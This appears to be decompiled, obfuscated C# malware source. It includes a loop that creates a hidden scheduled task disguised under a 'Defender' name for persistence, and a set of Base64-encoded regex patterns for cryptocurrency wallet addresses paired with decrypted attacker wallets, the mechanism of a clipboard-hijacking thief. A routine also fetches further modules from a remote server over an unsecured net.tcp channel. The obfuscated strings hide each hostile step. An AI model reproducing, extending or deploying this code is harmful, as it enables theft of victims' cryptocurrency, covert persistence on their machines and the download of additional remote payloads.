// Token: 0x06000019 RID: 25 RVA: 0x0000249C File Offset: 0x0000069C public static void oi8ju65g4(string AppPath, string Name) { Task.Factory.StartNew(delegate { for (;;) { try { Process.Start(new ProcessStartInfo { Arguments = string.Concat(new string[] { Fazathron.Base64Decode("L0Mgc2NodGFza3MgL2Nv.10yZWF0ZSAvdG4v.10gXFxEZWZlbmRlclxc").Replace("v.10", ""), Name, " /tr \"", AppPath, "\" /st ", DateTime.Now.AddMinutes(1.0).ToString("HH:mm"), " /du 9999:59 /sc daily /ri 1 /f" }), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, FileName = Fazathron.Base64Decode("Y21kLmVunique4ZQ==").Replace("unique", ""), RedirectStandardOutput = true, UseShellExecute = false }); } catch { } Thread.Sleep(50000); } }); }
// Token: 0x06000018 RID: 24 RVA: 0x0000245B File Offset: 0x0000065B public Ohoho(Fazathron settings) { if (settings == null) { throw new NullReferenceException("settings"); } this._settings = settings; }
// Token: 0x0600000A RID: 10 RVA: 0x000020D8 File Offset: 0x000002D8 public void Init(params string[] prms) { this._key = prms.Last <string>(); this.list.Add(new j7u7h7h6h6rg { Pattern = Fazathron.Base64Decode("KF5cK1xkezEsMn0pPygoXChcZHszfVwpKXwoXC0/XGR7M31cLSl8KFxkezN9KSkoKFxkezN9XC1cZHs0fSl@222!~8KFxkezN9XC1cZFxkX@222!~C1cZFxkKXwoXGR7N30pfChcZHszfVwtXGRcL@222!~VxkezN9KSk=".Replace("@222!~", string.Empty)) }); this.list.Add(new j7u7h7h6h6rg { Pattern = Fazathron.Base64Decode("XihbMTNdW2Etaaaaa!a20tekEtSEotTlAtWjEtOV17MjUaaaaa!sMzR9KSQ=".Replace("aaaaa!", string.Empty)) }); this.list.Add(new j7u7h7h6h6rg { Pattern = Fazathron.Base64Decode("XigweFs11111111111wLTlhLWZBLU11111111111ZdezQwfSkk".Replace("11111111111", string.Empty)) }); this.list.Add(new j7u7h7h6h6rg { Pattern = Fazathron.Base64Decode("XihMW2Ete####!!wwkEtWjAtOV17MjY####!!wwsMzN9KSQ=".Replace("####!!ww", string.Empty)) }); this.list.Add(new j7u7h7h6h6rg { Pattern = Fazathron.Base64Decode("XihyW3Jwc2huYWYzyyyy333OXdCVURORUdISktMTTRQUVJTyyyy333VDdWV1hZWjJiY2RlQ2c2NWprbThvRnFpMXR1dkF4eyyyy333XpdezI3LDM1fSkk".Replace("yyyy333", string.Empty)) }); this.list.Add(new j7u7h7h6h6rg { Pattern = Fazathron.Base64Decode("Xih0WzAtOWEtekEtuu343dcWl17MzR9KSQ=".Replace("uu343dc", string.Empty)) }); this.list.Add(new j7u7h7h6h6rg { Pattern = Fazathron.Base64Decode("XihEezF9WzUtOUEtSEoooooooooooooootTlAtVV17MX1bMS05QS1ISi1OUC1aYooooooooooooooS1rbS16XXszMn0pJA==".Replace("oooooooooooooo", string.Empty)) }); this.list.Add(new j7u7h7h6h6rg { Pattern = Fazathron.Base64Decode("Xig0WzAtO@@@@!!s1~UFCXVsxLTl@@@@!!s1~BLVphLXpdezkzLDEwNH0pJA==".Replace("@@@@!!s1~", string.Empty)) }); for (int i = 0; i < this.list.Count; i++) { this.Wallets.Add(i.ToString(), new j7u7h7h6h6rg { Pattern = this.list[i].Pattern, Wallet = this.Decrypt(prms[i]) }); } }
// Token: 0x06000021 RID: 33 RVA: 0x00002A70 File Offset: 0x00000C70 private List <ModuleFile> loadk2j1jd() { List <ModuleFile> result; try { InstanceContext callbackInstance = new InstanceContext(this); NetTcpBinding netTcpBinding = new NetTcpBinding { Security = new NetTcpSecurity { Mode = SecurityMode.None }, MaxBufferPoolSize = 2147483647L, MaxReceivedMessageSize = 2147483647L, ReaderQuotas = new XmlDictionaryReaderQuotas { MaxDepth = 2000000, MaxStringContentLength = int.MaxValue, MaxArrayLength = int.MaxValue, MaxBytesPerRead = int.MaxValue, MaxNameTableCharCount = int.MaxValue } }; netTcpBinding.SendTimeout = new TimeSpan(24, 30, 0); netTcpBinding.ReceiveTimeout = new TimeSpan(24, 30, 0); netTcpBinding.OpenTimeout = new TimeSpan(24, 30, 0); string uri = string.Format(Fazathron.Base64Decode("bmV0LnRjcDovLsk1kjd82jja3swfToyMzU2My9JQ29ubmVjdG9y".Replace("sk1kjd82jja", "")), this._settings.ServerAdress); IConnector connector = new DuplexChannelFactory <IConnector>(callbackInstance, netTcpBinding).CreateChannel(new EndpointAddress(uri)); result = connector.GetModuleList().Result; } catch (Exception value) { Console.WriteLine(value); result = new List <ModuleFile>(); } return(result); }